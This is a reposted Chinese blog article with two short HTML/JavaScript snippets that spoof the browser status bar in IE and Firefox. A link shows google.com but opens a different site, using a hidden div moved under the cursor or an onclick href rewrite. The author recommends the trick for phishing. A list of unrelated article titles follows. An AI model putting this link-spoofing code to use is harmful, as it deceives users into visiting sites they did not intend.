伪造浏览器的状态栏--IE和FireFox的ClickJacking
来源:互联网 发布:重庆时时彩往年数据 编辑:程序博客网 时间:2024/05/29 09:19
方法一:
先看下面一段代码:
--------------------------------------------------------------------------------------------------------------
<html><body><div id="open" onmouseover="document.location='http://www.uzmix.net';"style="position:absolute;width:8px;height:7px;background:#FFFFFF;border:1px"></div><script>function updatebox(evt) {mouseX=evt.pageX?evt.pageX:evt.clientX;mouseY=evt.pageY?evt.pageY:evt.clientY;document.getElementById('open').style.left=mouseX-2;document.getElementById('open').style.top=mouseY-2;}</script><center><br><br><a href="http://www.google.com" onclick="updatebox(event)"><fontstyle="font-family:arial;font-size:32px">http://www.google.com</font></a></html>
--------------------------------------------------------------------------------------------------------------
在IE或者FireFox中执行上面这段代码,当鼠标移动到超链接www.google.com上时,IE和FireFox的状态栏都显示为google的域名,但是当点击超链接时却打开了http://www.uzmix.net。这就实现了一个简单的clickjacking的攻击,用来钓鱼还是不错的。
分析一下代码可以知道,当点击超链接时,执行的函数updatebox(event)将id为open的div移动到了鼠标下面,模拟了一个onmouseover的操作。
方法二:
其实要隐藏状态栏,其实直接使a标签的onclick=“this.href='http://www.baidu.com'”即可,而且更具有欺骗性。
代码如下:----------------------------------------------------------------------------------------
<html><body><a href="http://www.google.com"onclick="this.href='http://www.baidu.com'">http://www.google.com</a></html>
----------------------------------------------------------------------------------------
- 伪造浏览器的状态栏--IE和FireFox的ClickJacking
- (转) IE和FireFox浏览器的兼容问题
- ie浏览器状态栏的进度条
- 兼容IE和Firefox浏览器状态栏隐藏页面链接地址
- firefox浏览器和IE
- IE和firefox浏览器在网页编程方面的区别
- 可以移动的层(Div)兼容IE和firefox浏览器
- IE和firefox浏览器的event事件兼容性(转帖)
- IE和Firefox浏览器的css兼容性要点
- 兼容Firefox和IE浏览器的“加入收藏”代码
- IE浏览器和Firefox下的HTTP调试工具
- IE和firefox浏览器的event事件兼容性汇总
- IE浏览器和Firefox下的HTTP调试工具
- IE和firefox浏览器的event事件兼容性汇总
- Firefox/Chrome/IE浏览器关于CSS和JavaScript的兼容性
- js 屏蔽 浏览器(IE和FireFox)的 刷新功能
- js屏蔽浏览器(IE和FireFox)的刷新功能
- Mozilla Firefox与IE浏览器的兼容性问题
- unicode编码宽字节与单字节之间的转换
- 内部方法删除监听
- 快排代码
- 數據庫日期函數
- Linux 实时技术与典型实现分析, 第 2 部分: Ingo Molnar 的实时补丁
- 伪造浏览器的状态栏--IE和FireFox的ClickJacking
- 怎样快速判断代理ip是否可用
- 纪念品分组
- 表单的通用验证
- Java中的clone
- 完全使用gnu linux工作
- Tombstone crash
- linux内核IOCTL网络控制框架实现分析
- 开源NoSQL系统 Membase